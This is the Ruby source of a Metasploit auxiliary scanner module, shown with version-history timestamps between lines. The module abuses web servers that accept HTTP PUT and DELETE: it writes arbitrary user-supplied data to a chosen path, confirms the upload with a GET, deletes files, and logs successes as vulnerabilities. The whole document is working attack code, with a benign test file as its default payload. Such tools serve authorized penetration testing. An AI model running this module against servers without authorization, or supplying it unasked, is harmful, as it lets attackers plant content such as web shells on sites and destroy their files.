metasploit-framework/modules/auxiliary/scanner/http/http_put.rb

193 lines
5.1 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
2016-03-08 13:02:44 +00:00
class MetasploitModule < Msf::Auxiliary
2013-08-30 21:28:54 +00:00
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::WmapScanDir
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize
super(
'Name' => 'HTTP Writable Path PUT/DELETE File Access',
'Description' => %q{
This module can abuse misconfigured web servers to upload and delete web content
via PUT and DELETE HTTP requests. Set ACTION to either PUT or DELETE.
PUT is the default. If filename isn't specified, the module will generate a
random string for you as a .txt file. If DELETE is used, a filename is required.
},
'Author' =>
[
'Kashif [at] compulife.com.pk',
'CG',
'sinn3r',
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '397'],
],
2013-08-30 21:28:54 +00:00
'Actions' =>
[
['PUT'],
['DELETE']
],
'DefaultAction' => 'PUT'
)
register_options(
[
OptString.new('PATH', [true, "The path to attempt to write or delete", "/"]),
OptString.new('FILENAME', [true, "The file to attempt to write or delete", "msf_http_put_test.txt"]),
OptString.new('FILEDATA', [false, "The data to upload into the file", "msf test file"]),
OptString.new('ACTION', [true, "PUT or DELETE", "PUT"])
], self.class)
end
#
# Send a normal HTTP request and see if we successfully uploaded or deleted a file.
# If successful, return true, otherwise false.
#
def file_exists(path, data)
begin
res = send_request_cgi(
{
'uri' => path,
'method' => 'GET',
'ctype' => 'text/plain',
'data' => data,
}, 20
).to_s
rescue ::Exception => e
2016-10-11 19:42:06 +00:00
print_error("#{ip}: Error: #{e.to_s}")
2013-08-30 21:28:54 +00:00
return nil
end
return (res =~ /#{data}/) ? true : false
end
#
# Do a PUT request to the server. Function returns the HTTP response.
#
def do_put(path, data)
begin
res = send_request_cgi(
{
'uri' => normalize_uri(path),
'method' => 'PUT',
'ctype' => 'text/plain',
'data' => data,
}, 20
)
rescue ::Exception => e
2016-10-11 19:42:06 +00:00
print_error("#{ip}: Error: #{e.to_s}")
2013-08-30 21:28:54 +00:00
return nil
end
return res
end
#
# Do a DELETE request. Function returns the HTTP response.
#
def do_delete(path)
begin
res = send_request_cgi(
{
'uri' => normalize_uri(path),
'method' => 'DELETE',
'ctype' => 'text/html',
}, 20
)
rescue ::Exception => e
2016-10-11 19:42:06 +00:00
print_error("#{ip}: Error: #{e.to_s}")
2013-08-30 21:28:54 +00:00
return nil
end
return res
end
#
# Main function for the module, duh!
#
def run_host(ip)
path = datastore['PATH']
data = datastore['FILEDATA']
if path[-1,1] != '/'
path += '/'
end
path += datastore['FILENAME']
case action.name
when 'PUT'
# Append filename if there isn't one
2013-08-30 21:28:54 +00:00
if path !~ /(.+\.\w+)$/
path << "#{Rex::Text.rand_text_alpha(5)}.txt"
2016-10-11 19:42:06 +00:00
vprint_status("#{ip}: No filename specified. Using: #{path}")
2013-08-30 21:28:54 +00:00
end
# Upload file
2013-08-30 21:28:54 +00:00
res = do_put(path, data)
vprint_status("Reply: #{res.code.to_s}") if not res.nil?
# Check file
2013-08-30 21:28:54 +00:00
if not res.nil? and file_exists(path, data)
turl = "#{(ssl ? 'https' : 'http')}://#{ip}:#{rport}#{path}"
print_good("File uploaded: #{turl}")
report_vuln(
:host => ip,
:port => rport,
:proto => 'tcp',
:name => self.name,
:info => "Module #{self.fullname} confirmed write access to #{turl} via PUT",
:refs => self.references,
:exploited_at => Time.now.utc
)
else
2016-10-11 19:42:06 +00:00
print_error("#{ip}: File doesn't seem to exist. The upload probably failed.")
2013-08-30 21:28:54 +00:00
end
when 'DELETE'
# Check file before deleting
2013-08-30 21:28:54 +00:00
if path !~ /(.+\.\w+)$/
print_error("You must supply a filename")
return
elsif not file_exists(path, data)
print_error("File is already gone. Will not continue DELETE")
return
end
# Delete our file
2013-08-30 21:28:54 +00:00
res = do_delete(path)
2016-10-11 19:42:06 +00:00
vprint_status("#{ip}: Reply: #{res.code.to_s}") if not res.nil?
2013-08-30 21:28:54 +00:00
# Check if DELETE was successful
2013-08-30 21:28:54 +00:00
if res.nil? or file_exists(path, data)
2016-10-11 19:42:06 +00:00
print_error("#{ip}: DELETE failed. File is still there.")
2013-08-30 21:28:54 +00:00
else
turl = "#{(ssl ? 'https' : 'http')}://#{ip}:#{rport}#{path}"
print_good("File deleted: #{turl}")
report_vuln(
:host => ip,
:port => rport,
:proto => 'tcp',
:sname => (ssl ? 'https' : 'http'),
:name => self.name,
:info => "Module #{self.fullname} confirmed write access to #{turl} via DELETE",
:refs => self.references,
:exploited_at => Time.now.utc
)
end
end
end
end